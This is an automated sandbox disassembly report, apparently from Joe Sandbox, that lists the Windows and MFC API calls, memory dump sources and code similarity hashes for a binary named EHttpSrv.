                                                                                                                • API ID: #4026$#2310#314#578#6735#6751
                                                                                                                • String ID:
                                                                                                                • API String ID: 1152340505-0
                                                                                                                • Opcode ID: aea3eb7ab47aaac884afba9da9087e3c5bd6c835ab55cae6a36f454c8326b254
                                                                                                                • Instruction ID: 8f5a687574ce4ce5ad568c4f72d1fdae622d59998485b5505ef5895051a5d4f4
                                                                                                                • Opcode Fuzzy Hash: aea3eb7ab47aaac884afba9da9087e3c5bd6c835ab55cae6a36f454c8326b254
                                                                                                                • Instruction Fuzzy Hash: CD619875A08700DFD704CF94C884B5AB7B5FB88719F10C62EEA516B390DB79A909CB92
                                                                                                                APIs
                                                                                                                • #310.MFC80U(00000000,FEEA6C22,00000000,?,?,00000000,00000000,20480B9B,000000FF,204419EB,00000000), ref: 20445C40
                                                                                                                • #310.MFC80U ref: 20445C51
                                                                                                                • #310.MFC80U ref: 20445C62
                                                                                                                • #310.MFC80U ref: 20445C73
                                                                                                                • #310.MFC80U ref: 20445C84
                                                                                                                • #310.MFC80U ref: 20445C95
                                                                                                                • #310.MFC80U ref: 20445CA6
                                                                                                                • #310.MFC80U ref: 20445CB7
                                                                                                                • #310.MFC80U ref: 20445CC8
                                                                                                                • #310.MFC80U ref: 20445CD9
                                                                                                                • #310.MFC80U ref: 20445CEA
                                                                                                                  • Part of subcall function 20440280: #6735.MFC80U ref: 204402E6
                                                                                                                  • Part of subcall function 20440280: #6735.MFC80U(20485878,0000011F), ref: 2044030D
                                                                                                                  • Part of subcall function 20440280: #6735.MFC80U(20485878), ref: 20440323
                                                                                                                • EnterCriticalSection.KERNEL32(00003FC8,00000104), ref: 20445D13
                                                                                                                • LeaveCriticalSection.KERNEL32(00003FC8), ref: 20445D21
                                                                                                                • memset.MSVCR80 ref: 20445D2E
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                 • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                 • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                 • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                 • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmp
                                                                                                                 • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                 • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: #310$#6735$CriticalSection$EnterLeavememset
                                                                                                                • String ID:
                                                                                                                • API String ID: 3143921478-0
                                                                                                                • Opcode ID: 2157d352ddc2455e798fedfbc3618833a5aa07da9aa986f8a3d86055a92f27a7
                                                                                                                • Instruction ID: 24daf216aa99d7273f657a96e9add7aef185053559727ef4d998557eda13c0bf
                                                                                                                • Opcode Fuzzy Hash: 2157d352ddc2455e798fedfbc3618833a5aa07da9aa986f8a3d86055a92f27a7
                                                                                                                • Instruction Fuzzy Hash: AB415E31008B81DFC311DF65CC8879BBBE4EB65719F048D2DE4A682291DB79660DCFA2
                                                                                                                APIs
                                                                                                                • #4109.MFC80U(00000000,00000120,00000000,?,000004C3,0000000F), ref: 2045F349
                                                                                                                • SendMessageW.USER32(?), ref: 2045F36E
                                                                                                                • #3877.MFC80U(00000001,00000000,00000000,00000000,00000000,00000000,00000000,FFFF0000,FFFF0000,?,00000000), ref: 2045F3FD
                                                                                                                • #5864.MFC80U(00000000,00000008,00000000,00000000,00000000,00000010,00000010,00000000,00000001,00000000,00000000,00000000,00000000,00000000,00000000,FFFF0000), ref: 2045F419
                                                                                                                • #5864.MFC80U(00000000,00000004,00000000,00000000,00000000,00000000,00000000,?,00000000,00000008,00000000,00000000,00000000,00000010,00000010,00000000), ref: 2045F42E
                                                                                                                • #3877.MFC80U(00000001,?,00000000,00000000,00000000,00000000,00000000,FFFF0000,FFFF0002,00000000,00000004,00000000,00000000,00000000,00000000,00000000), ref: 2045F512
                                                                                                                • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 2045F528
                                                                                                                • #3877.MFC80U(00000001,?,00000000,00000000,00000000,00000000,00000000,FFFF0000,FFFF0002,00000000,00000004,00000000,00000000,00000000,00000000,00000000), ref: 2045F55B
                                                                                                                • #5864.MFC80U(00000000,00000004,00000000,00000000,00000000,00000000,00000000,00000000,00000001,?,00000000,00000000,00000000,00000000,00000000,FFFF0000), ref: 2045F57A
                                                                                                                • #5747.MFC80U(00000000,?,00000000,00000004,00000000,00000000,00000000,00000000,00000000,00000000,00000001,?,00000000,00000000,00000000,00000000), ref: 2045F59D
                                                                                                                • SendMessageW.USER32(?,00001102,00000002,FFFF0000), ref: 2045F5DE
                                                                                                                • SendMessageW.USER32(?,00001101,00000000,00000000), ref: 2045F5F9
                                                                                                                • #5982.MFC80U(00000001,00000000,00000001,?,00000000), ref: 2045F626
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                 • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                 • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                 • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                 • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmp
                                                                                                                 • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                 • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend$#3877#5864$#4109#5747#5982
                                                                                                                • String ID:
                                                                                                                • API String ID: 3275147637-0
                                                                                                                • Opcode ID: 9dd212be45086d75f6ae4a172555495b67a5b5979c489670bcb928c4cd8918b4
                                                                                                                • Instruction ID: e9f79f5a2f50c667ce6c69e562628473a29d41ef9b7a263904081b92f45a8f23
                                                                                                                • Opcode Fuzzy Hash: 9dd212be45086d75f6ae4a172555495b67a5b5979c489670bcb928c4cd8918b4
                                                                                                                • Instruction Fuzzy Hash: 6D818F70784302AFD318CF50C895F6ABBA4FB54B04F14865CF6455B2E2D7B8AC4ACB96
                                                                                                                APIs
                                                                                                                • #310.MFC80U(FEEA6C22), ref: 20454236
                                                                                                                • wcsncmp.MSVCR80 ref: 204542A2
                                                                                                                  • Part of subcall function 2043AB10: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000000,00000000,204542B6), ref: 2043AB2A
                                                                                                                  • Part of subcall function 2043AB10: GetLastError.KERNEL32 ref: 2043AB35
                                                                                                                • wcsncmp.MSVCR80 ref: 204542EB
                                                                                                                • GetSystemMetrics.USER32(00000031), ref: 20454325
                                                                                                                • #1079.MFC80U(?,000000FF,?), ref: 20454368
                                                                                                                • DestroyCursor.USER32(?), ref: 20454383
                                                                                                                • #1176.MFC80U ref: 2045438B
                                                                                                                • #776.MFC80U(?), ref: 204543A1
                                                                                                                • #3873.MFC80U(00000003,00000000,?,00000000,00000000,?,00000000), ref: 204543C3
                                                                                                                • #5862.MFC80U(00000000,00000001,00000003,00000000,?,00000000,00000000,00000000,00000003,00000000,?,00000000,00000000,?,00000000), ref: 204543E6
                                                                                                                • #5862.MFC80U(00000000,00000000,00000004,00000000,00000000,00000000,00000000,?,00000000,00000001,00000003,00000000,?,00000000,00000000,00000000), ref: 20454402
                                                                                                                • #5742.MFC80U(00000000,?,00000000,00000000,00000004,00000000,00000000,00000000,00000000,?,00000000,00000001,00000003,00000000,?,00000000), ref: 20454430
                                                                                                                • #578.MFC80U ref: 20454444
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                 • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                 • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                 • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                 • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmp
                                                                                                                 • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                 • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: #5862wcsncmp$#1079#1176#310#3873#5742#578#776CreateCursorDestroyErrorFileLastMetricsSystem
                                                                                                                • String ID:
                                                                                                                • API String ID: 1150038964-0
                                                                                                                • Opcode ID: 9f5206003f6ed2973ce07917a7ff6ec924d8b96aed58063a2543852da7b61b2e
                                                                                                                • Instruction ID: 479ed0915f2eeaa8b574ac43a3881d8b8663088f3cfef44c723c3c907148f41c
                                                                                                                • Opcode Fuzzy Hash: 9f5206003f6ed2973ce07917a7ff6ec924d8b96aed58063a2543852da7b61b2e
                                                                                                                • Instruction Fuzzy Hash: 0561D0713046009FD320CF58CC85F6EBBE4AFE4B18F50852CF545AB2E1DA75A94ACB91
                                                                                                                APIs
                                                                                                                • VariantInit.OLEAUT32(?), ref: 20432E63
                                                                                                                • VariantChangeType.OLEAUT32(?,?,00000000,00000003), ref: 20432E80
                                                                                                                • VariantCopy.OLEAUT32(?,?), ref: 20432E93
                                                                                                                • GetFocus.USER32 ref: 20432ED5
                                                                                                                • #2366.MFC80U(00000000), ref: 20432EDC
                                                                                                                • #5829.MFC80U(00000000), ref: 20432EE7
                                                                                                                • InvalidateRect.USER32(?,?,00000001,?,?,?,00000000), ref: 20432F15
                                                                                                                • InvalidateRect.USER32(?,?,00000001,?,?,?,00000000), ref: 20432F22
                                                                                                                • InvalidateRect.USER32(?,?,00000001,?,?,?,00000000), ref: 20432F2F
                                                                                                                • InvalidateRect.USER32(?,?,00000001,?,?,?,?,?,?,00000000), ref: 20432F57
                                                                                                                • InvalidateRect.USER32(?,?,00000001,?,?,?,?,?,?,00000000), ref: 20432F64
                                                                                                                • InvalidateRect.USER32(?,?,00000001,?,?,?,?,?,?,00000000), ref: 20432F71
                                                                                                                • #931.MFC80U(?), ref: 20432FA0
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                 • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                 • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                 • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                 • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmp
                                                                                                                 • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                 • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: InvalidateRect$Variant$#2366#5829#931ChangeCopyFocusInitType
                                                                                                                • String ID:
                                                                                                                • API String ID: 955593151-0
                                                                                                                • Opcode ID: c5e2da395930f61b844a44f2bc0d0ae6e1df8a7d97cae30f990c223835d46e9f
                                                                                                                • Instruction ID: 54aef1c164e554c70e00ceb81e3176a7b1b36d9b59236c1140e2668beb021dd4
                                                                                                                • Opcode Fuzzy Hash: c5e2da395930f61b844a44f2bc0d0ae6e1df8a7d97cae30f990c223835d46e9f
                                                                                                                • Instruction Fuzzy Hash: 29415072204704ABC310DFA8CC85EABB7E8FB88754F40CA1DFA45C7250E675E904CBA1
APIs
• #764.MFC80U(?,FEEA6C22,00000000,?,?,00000000,2047EF37,000000FF,204141E8), ref: 2041C441
• #764.MFC80U(?,FEEA6C22,00000000,?,?,00000000,2047EF37,000000FF,204141E8), ref: 2041C45A
• #764.MFC80U(?,FEEA6C22,00000000,?,?,00000000,2047EF37,000000FF,204141E8), ref: 2041C473
• #764.MFC80U(?,FEEA6C22,00000000,?,?,00000000,2047EF37,000000FF,204141E8), ref: 2041C48C
• #764.MFC80U(?,FEEA6C22,00000000,?,?,00000000,2047EF37,000000FF,204141E8), ref: 2041C4A5
• #764.MFC80U(?,FEEA6C22,00000000,?,?,00000000,2047EF37,000000FF,204141E8), ref: 2041C4BE
• #764.MFC80U(?,FEEA6C22,00000000,?,?,00000000,2047EF37,000000FF,204141E8), ref: 2041C4CE
• #764.MFC80U(?,FEEA6C22,00000000,?,?,00000000,2047EF37,000000FF,204141E8), ref: 2041C4DE
• #764.MFC80U(?,FEEA6C22,00000000,?,?,00000000,2047EF37,000000FF,204141E8), ref: 2041C4FA
• #764.MFC80U(?,FEEA6C22,00000000,?,?,00000000,2047EF37,000000FF,204141E8), ref: 2041C516
• #764.MFC80U(?,FEEA6C22,00000000,?,?,00000000,2047EF37,000000FF,204141E8), ref: 2041C532
• #764.MFC80U(?,FEEA6C22,00000000,?,?,00000000,2047EF37,000000FF,204141E8), ref: 2041C54D
• #764.MFC80U(?,FEEA6C22,00000000,?,?,00000000,2047EF37,000000FF,204141E8), ref: 2041C56C
Memory Dump Source
• Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
• Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
Similarity
• API ID: #764
• String ID:
• API String ID: 441403673-0
APIs
• GetCurrentObject.GDI32(?,00000001), ref: 2042FE0D
• #2362.MFC80U(00000000,?,?,?,?,?,?,?,?,?,FEEA6C22), ref: 2042FE14
• GetSysColor.USER32(00000008), ref: 2042FE1D
• #502.MFC80U(00000000,00000001,00000000,?,?,?,?,?,?,?,?,?,FEEA6C22), ref: 2042FE2C
• #5638.MFC80U(00000001), ref: 2042FE40
• GetObjectW.GDI32(?,00000010,?), ref: 2042FE50
• SetPixel.GDI32(?,?,?,?), ref: 2042FE88
• #4117.MFC80U(?,?,?), ref: 2042FE9D
• #3995.MFC80U(?,?,?,?,?), ref: 2042FEAF
• #4117.MFC80U(?,?,?,?,?,?,?,?), ref: 2042FEC3
• #3995.MFC80U(?,?,?,?,?,?,?,?,?,?), ref: 2042FED5
• #4117.MFC80U(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 2042FEE9
• #3995.MFC80U(000000FF,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 2042FEF9
  • Part of subcall function 20414A70: #1925.MFC80U(FEEA6C22,?,?,?,00000000,2047B9E9,000000FF), ref: 20414AB9
Similarity
• API ID: #3995#4117$Object$#1925#2362#502#5638ColorCurrentPixel
• String ID:
• API String ID: 4087137754-0
APIs
• #310.MFC80U(FEEA6C22,?,?,?,?,?,2047A999,000000FF,2044623F,00000000,FEEA6C22), ref: 2044677A
• #2121.MFC80U(?,?,?,?,?,2047A999), ref: 20446790
• #2310.MFC80U(?,?,?,?,?,?,?,?,2047A999), ref: 204467B7
• #2310.MFC80U(?,000001DA,?,?), ref: 204467DC
• #896.MFC80U(?), ref: 204467E8
• #2310.MFC80U(?,000001DB,?), ref: 204467FF
• #896.MFC80U(?), ref: 2044680B
• #2310.MFC80U(?,000001DC,?), ref: 20446822
• #896.MFC80U(?), ref: 2044682E
• #2310.MFC80U(?,000001DE,?), ref: 20446855
• #2310.MFC80U(?,000001DD,?), ref: 2044687C
• #896.MFC80U(?), ref: 20446888
• #578.MFC80U ref: 2044689A
Similarity
• API ID: #2310$#896$#2121#310#578
• String ID:
• API String ID: 431348084-0
APIs
Strings
Similarity
• API ID: freememsetstrncmp$BitmapCreatemalloc
• String ID: $($GIF87a$GIF89a
• API String ID: 1939045392-356550005
APIs
Strings
Similarity
• API ID: #1176
• String ID: @iH $APP_FLAGS$BROWSER$BROWSERS$EXCLUDE$PATH$PE_MODULE$PE_MODULES$SETTINGS$TiH
• API String ID: 1925220103-915843508
APIs
  • Part of subcall function 20420040: #764.MFC80U(?,?,?,20462BF8,FEEA6C22,?,?,?,00000000,00000000,2047AC89,000000FF,20462A77,?,?,00000000), ref: 20420074
  • Part of subcall function 2041B640: #764.MFC80U(?,?,?,20462C00,FEEA6C22,?,?,?,00000000,00000000,2047AC89,000000FF,20462A77,?,?,00000000), ref: 2041B674
  • Part of subcall function 20412B10: #1176.MFC80U(FEEA6C22,?,?,00000000,00000000,2047CFDF,000000FF,20462C0A,00000000,FEEA6C22,?,?,?,00000000,00000000,2047AC89), ref: 20412B3D
  • Part of subcall function 20412B10: #764.MFC80U(?,FEEA6C22,?,?,00000000,00000000,2047CFDF,000000FF,20462C0A,00000000,FEEA6C22,?,?,?,00000000,00000000), ref: 20412B64
  • Part of subcall function 20412B10: #764.MFC80U(?,FEEA6C22,?,?,00000000,00000000,2047CFDF,000000FF,20462C0A,00000000,FEEA6C22,?,?,?,00000000,00000000), ref: 20412B74
  • Part of subcall function 20412B10: #764.MFC80U(?,FEEA6C22,?,?,00000000,00000000,2047CFDF,000000FF,20462C0A,00000000,FEEA6C22,?,?,?,00000000,00000000), ref: 20412B84
  • Part of subcall function 20412B10: #764.MFC80U(?,FEEA6C22,?,?,00000000,00000000,2047CFDF,000000FF,20462C0A,00000000,FEEA6C22,?,?,?,00000000,00000000), ref: 20412B94
  • Part of subcall function 20412B10: #764.MFC80U(?,FEEA6C22,?,?,00000000,00000000,2047CFDF,000000FF,20462C0A,00000000,FEEA6C22,?,?,?,00000000,00000000), ref: 20412BAD
  • Part of subcall function 2040F390: #764.MFC80U(?,?,00000000,?,20462C12,00000000,FEEA6C22,?,?,?,00000000,00000000,2047AC89,000000FF,20462A77,?), ref: 2040F3AF
  • Part of subcall function 2040F390: #764.MFC80U(?,00000000,?,20462C12,00000000,FEEA6C22,?,?,?,00000000,00000000,2047AC89,000000FF,20462A77,?), ref: 2040F3C7
• EnterCriticalSection.KERNEL32(?,00000000,FEEA6C22,00000003,-00003AB4,?,?,?,00000000,20481C82,000000FF,204624F9,-00003AB4,?,?,00000000), ref: 204683BA
  • Part of subcall function 20412B10: #265.MFC80U(00000000,FEEA6C22,?,?,00000000,00000000,2047CFDF,000000FF,20462C0A,00000000,FEEA6C22,?,?,?,00000000,00000000), ref: 20412BF3
  • Part of subcall function 20412B10: memset.MSVCR80 ref: 20412C00
  • Part of subcall function 2040FCE0: #764.MFC80U(?,FEEA6C22,?,?,00000000,00000000,00000000,2047F1AF,000000FF,20462C1C,00000000,FEEA6C22,?,?,?,00000000), ref: 2040FD2D
  • Part of subcall function 2040FCE0: #764.MFC80U(?,FEEA6C22,?,?,00000000,00000000,00000000,2047F1AF,000000FF,20462C1C,00000000,FEEA6C22,?,?,?,00000000), ref: 2040FD3D
  • Part of subcall function 2040FCE0: #764.MFC80U(?,FEEA6C22,?,?,00000000,00000000,00000000,2047F1AF,000000FF,20462C1C,00000000,FEEA6C22,?,?,?,00000000), ref: 2040FD51
• LeaveCriticalSection.KERNEL32(00000000,?,?,?,?,?,?,?,00000000,?,?,?,00000000,20481C82,000000FF,204624F9), ref: 20468556
• #310.MFC80U(?,?,?,00000000,20481C82,000000FF,204624F9,-00003AB4,?,?,00000000), ref: 20468568
• #310.MFC80U(?,?,?,00000000,20481C82,000000FF,204624F9,-00003AB4,?,?,00000000), ref: 2046857A
• #4026.MFC80U(000000B7,?,?,?,00000000,20481C82,000000FF,204624F9,-00003AB4,?,?,00000000), ref: 2046858E
• #4026.MFC80U(000000B2,?,?,?,00000000,20481C82,000000FF,204624F9,-00003AB4,?,?,00000000), ref: 2046859D
• MessageBoxW.USER32(00000000,?,00000001,00000010), ref: 204685B1
• #578.MFC80U(?,?,?,00000000,20481C82,000000FF,204624F9,-00003AB4,?,?,00000000), ref: 204685C0
  • Part of subcall function 20401670: malloc.MSVCR80 ref: 2040169E
  • Part of subcall function 20401670: malloc.MSVCR80 ref: 204016B0
  • Part of subcall function 20401670: free.MSVCR80 ref: 204016BD
• #578.MFC80U(?,?,?,00000000,20481C82,000000FF,204624F9,-00003AB4,?,?,00000000), ref: 204685D2
Strings
Similarity
• API ID: #764$#310#4026#578CriticalSectionmalloc$#1176#265EnterLeaveMessagefreememset
• String ID: ALL$REMOVED
• API String ID: 217918462-2702759755
                                                                                                                • Opcode ID: a013223bbd1a5acbed5b7c5a7ddfba7f9a8956f06be30daa9be0da43713f8b23
                                                                                                                • Instruction ID: cd4611c72566d2ff1785ef4a9288bc029c4182c3f19a60ae6c62f54ef4cad2ea
                                                                                                                • Opcode Fuzzy Hash: a013223bbd1a5acbed5b7c5a7ddfba7f9a8956f06be30daa9be0da43713f8b23
                                                                                                                • Instruction Fuzzy Hash: FB71A4311183448BC725DFA4CC85BDE77A8AF54B18F448A2DFD49A7251EF38AB09CB52
APIs
• #310.MFC80U(FEEA6C22,00000060,00000000,?), ref: 2044BD00
• #776.MFC80U(20485878), ref: 2044BD1B
• _snwprintf_s.MSVCR80 ref: 2044BD6A
• _snwprintf_s.MSVCR80 ref: 2044BDB0
• #2310.MFC80U(0000005C,0000025D,?,?), ref: 2044BDC5
• #2310.MFC80U(0000005C,0000025E,?,?,?,?), ref: 2044BE5B
• #578.MFC80U ref: 2044BF17
Strings
Memory Dump Source
• Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
• Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
Similarity
• API ID: #2310_snwprintf_s$#310#578#776
• String ID: %d.%d.%d.%d
• API String ID: 3047567187-3491811756
• Opcode ID: 711c0d1743466385d14677d78091ab1b0e3b370ab87f57eda0f6f6fb23002789
• Instruction ID: 64d5185aea64a231b12683cea7eaeca9a7e724b78cc2e952a1de70f8f02ff7a7
• Opcode Fuzzy Hash: 711c0d1743466385d14677d78091ab1b0e3b370ab87f57eda0f6f6fb23002789
• Instruction Fuzzy Hash: 0E7129B5508700DFD324CF65C885F6AB7F5AF89215F008A1EF5DA93390D738AA08DB52
APIs
  • Part of subcall function 2042C340: #356.MFC80U(FEEA6C22,00000000,0000000B,?,000000FF,2047EBCB,000000FF,204402AC,0000000B,FEEA6C22,00000000,00000000,00000104,2047FA81,000000FF,20445D01), ref: 2042C369
  • Part of subcall function 2042C340: #310.MFC80U(FEEA6C22,00000000,0000000B,?,000000FF), ref: 2042C3B1
  • Part of subcall function 2042C340: #563.MFC80U(?,000000FF), ref: 2042C3C2
  • Part of subcall function 20430DC0: #310.MFC80U(?,FEEA6C22,00000000,?,00000000,?,2047AE6F,000000FF,20472632,?), ref: 20430DFC
  • Part of subcall function 20430DC0: #557.MFC80U ref: 20430E0A
  • Part of subcall function 20430DC0: #310.MFC80U ref: 20430E17
  • Part of subcall function 20430DC0: #557.MFC80U ref: 20430E25
  • Part of subcall function 20430DC0: LoadCursorW.USER32(00000000,00007F89), ref: 20430EA4
  • Part of subcall function 20430DC0: SetRectEmpty.USER32(?), ref: 20430F17
• #310.MFC80U(?), ref: 2047263D
• #4026.MFC80U(00000134), ref: 20472676
• #1925.MFC80U ref: 2047267E
  • Part of subcall function 2043D740: FindResourceW.KERNEL32(00000000,?,GIF,00000000,?,?,20472692,0000024F), ref: 2043D766
  • Part of subcall function 2043D740: #1058.MFC80U(?,GIF), ref: 2043D77A
• GetDC.USER32(00000000), ref: 2047269D
• ReleaseDC.USER32(00000000,00000000), ref: 204726BC
• #1271.MFC80U(00000000,00000000,?,?), ref: 204726C7
• #1925.MFC80U(00000000,00000000,?,?), ref: 204726D2
• GetDC.USER32(00000000), ref: 204726F1
• ReleaseDC.USER32(00000000,00000000), ref: 20472714
  • Part of subcall function 2043AC00: FindResourceW.KERNEL32(00000000,00000251,GIF,?,?,00000000,?,2047270C,00000000), ref: 2043AC0B
• #1271.MFC80U(00000000,00000000,00000000,?,?), ref: 20472721
Strings
Memory Dump Source
• Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
• Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
Similarity
• API ID: #310$#1271#1925#557FindReleaseResource$#1058#356#4026#563CursorEmptyLoadRect
• String ID: GIF
• API String ID: 1177867380-881873598
• Opcode ID: b7200a02f795109c7e3eb7b4e087aaed166f4e15dd9ffb2c75fad47bf353b740
• Instruction ID: 828355b6802e1fa0bfbb646ce676a9dde5f4986e1d25ae84e4f5a662b53f8f16
• Opcode Fuzzy Hash: b7200a02f795109c7e3eb7b4e087aaed166f4e15dd9ffb2c75fad47bf353b740
• Instruction Fuzzy Hash: E3410671104B008FC314DBA4CD86B87BBE4ABA4B09F00C93DF95A97390DBBCA9088752
APIs
Strings
Memory Dump Source
• Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
• Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
Similarity
• API ID: #6063$#1472#2311#310#3756#578MessageSend
• String ID: xXH
• API String ID: 2921591435-4004433314
• Opcode ID: 20ee8d277595217f224ac11ba57411c7c1efebbf3dd559737b910e1f0afa3dc6
• Instruction ID: 7ec89fc532f9ed1773e2f76ecb9491f977f3ba89ceb0169c2ac635186d8c60f8
• Opcode Fuzzy Hash: 20ee8d277595217f224ac11ba57411c7c1efebbf3dd559737b910e1f0afa3dc6
• Instruction Fuzzy Hash: 8641D2711087459FC724CF54CC90BEBBBE9FB58314F008A2DF959576A1EB38A609CB51
APIs
• #3793.MFC80U(?,?,?), ref: 20436BCD
• #2870.MFC80U(00000000,?,00000001,?,?), ref: 20436BE5
• PtInRect.USER32(?,?,?), ref: 20436BF4
• SendMessageW.USER32(?,00001102,00000003,00000000), ref: 20436C10
• GetParent.USER32(?), ref: 20436C16
• #2366.MFC80U(00000000), ref: 20436C1D
• #2648.MFC80U(00000000), ref: 20436C31
• #2648.MFC80U ref: 20436C44
• SendMessageW.USER32(?,0000004E,00000000,00000000), ref: 20436C55
• #1894.MFC80U(?,?), ref: 20436C59
Strings
Memory Dump Source
• Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
• Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmp
